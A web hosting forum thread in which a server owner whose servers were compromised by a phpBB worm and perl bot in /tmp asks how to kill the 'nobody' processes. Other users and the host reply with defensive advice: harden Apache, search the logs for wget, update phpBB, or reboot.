how can i kill all process nobody?

[eLifeCP]

i have alot problem.i have 10 server i use trustix,redhat 9,redhat enterprise,centOS,fedora and freebsd.i think no OS can protect tmp.i found bot.txt worm.txt phpbb worm udb.pl.

i find perl process in tmp alway.i want to how can i protect it and what command about kill all process nobody.

i have suggest from ev1 but i don't know how can i do?i ask cpanel but cpanel suggest me i must be find customer run it.

i try to search in this forum.i found this command for find customer have problem.

grep "wget" /usr/local/apache/domlogs/*

ev1 suggest me for this problem about udb.pl

-------------------------------------------------------
Our investigation found that your server was only exploited. No rootkits were installed. Nor was root access achieved. None of you local user accounts had started the attack sript either.

Simply put, the hacker exploited the system, most likely via an apache/website script, achieved a terminal shell connection simular to ssh and telnet, then proceeded to launched an outbound attack.

Some of the best ways to secure the server are: Have apache run under it's own user name (apache or httpd). Have the 'user' account for apache be unable to execute files located in /tmp and /var/tmp directories. Also have the user account 'nobody' should have these execution rights removed also. Nor should apache have access to execute any other applications beyond php/cgi/perl/ect to prevent future exploitation.

Then you want to comb thru the httpd and other logs under /var/log/ and see if you can identify the means with which the hacker exploited the system to gain access. (IE did they use a buffer overflow exploit on apache? Or did they take advantage of some security hole on a website's perl/cgi/php/ect script ? Was the ftp service exploited? Once the security hole that they came in on has been identified, you can set out to secure the server so that it's not exploited once more via that hole.
-------------------------------------------------------

whoever can tell me how can i do?

Thank you so much
Best Regards
eLife

[AndyReed]

I suggest you protect and secure your servers. Running a couple of commands to kill some processes won't solve the issue. If you don't wish to hire a sys admin to secure your server(s), you need to search these forums. The security issue you're dealing with has been discusses many time.

[rpmws]

i have alot problem.i have 10 server i use trustix,redhat 9,redhat enterprise,centOS,fedora and freebsd.i think no OS can protect tmp.i found bot.txt worm.txt phpbb worm udb.pl.

i find perl process in tmp alway.i want to how can i protect it and what command about kill all process nobody.

i have suggest from ev1 but i don't know how can i do?i ask cpanel but cpanel suggest me i must be find customer run it.

i try to search in this forum.i found this command for find customer have problem.

grep "wget" /usr/local/apache/domlogs/*

ev1 suggest me for this problem about udb.pl

-------------------------------------------------------
Our investigation found that your server was only exploited. No rootkits were installed. Nor was root access achieved. None of you local user accounts had started the attack sript either.

Simply put, the hacker exploited the system, most likely via an apache/website script, achieved a terminal shell connection simular to ssh and telnet, then proceeded to launched an outbound attack.

Some of the best ways to secure the server are: Have apache run under it's own user name (apache or httpd). Have the 'user' account for apache be unable to execute files located in /tmp and /var/tmp directories. Also have the user account 'nobody' should have these execution rights removed also. Nor should apache have access to execute any other applications beyond php/cgi/perl/ect to prevent future exploitation.

Then you want to comb thru the httpd and other logs under /var/log/ and see if you can identify the means with which the hacker exploited the system to gain access. (IE did they use a buffer overflow exploit on apache? Or did they take advantage of some security hole on a website's perl/cgi/php/ect script ? Was the ftp service exploited? Once the security hole that they came in on has been identified, you can set out to secure the server so that it's not exploited once more via that hole.
-------------------------------------------------------

whoever can tell me how can i do?

Thank you so much
Best Regards
eLife

searching logs for wget will get you started on what site was used. find all the old phpBB installs and fix that ..mod_security helps some. But if you have no clue what this all means .. get an admin that does.

[WestBend]

www.cplicensing.net.
Download their check phpBB version script to look for bad phpBB's. Also check for Wordpress Versions less than 1.5.2.

Pay chirpy to secure your servers !
www.configservers.com
He does a great job!

[eLifeCP]

Thank you so much i find phpBB old version but when i find nobody perl process.i have alot process.i need command about killall process nobody for kill it and fix later.Whoever help me for command.

Thank you so much

[lloyd_tennison]

For someone who is NOT a server admin, you can kill all the processes (but it probably will not do much good as they might just start all over again with the exploit) by simply rebooting.

No hard commands, no searching and killing processes, just reboot.

(BTW - the command for that from ssh is "reboot" - without the qoutes. It may take 15 minutes before all services are restarted, so be aware of that.)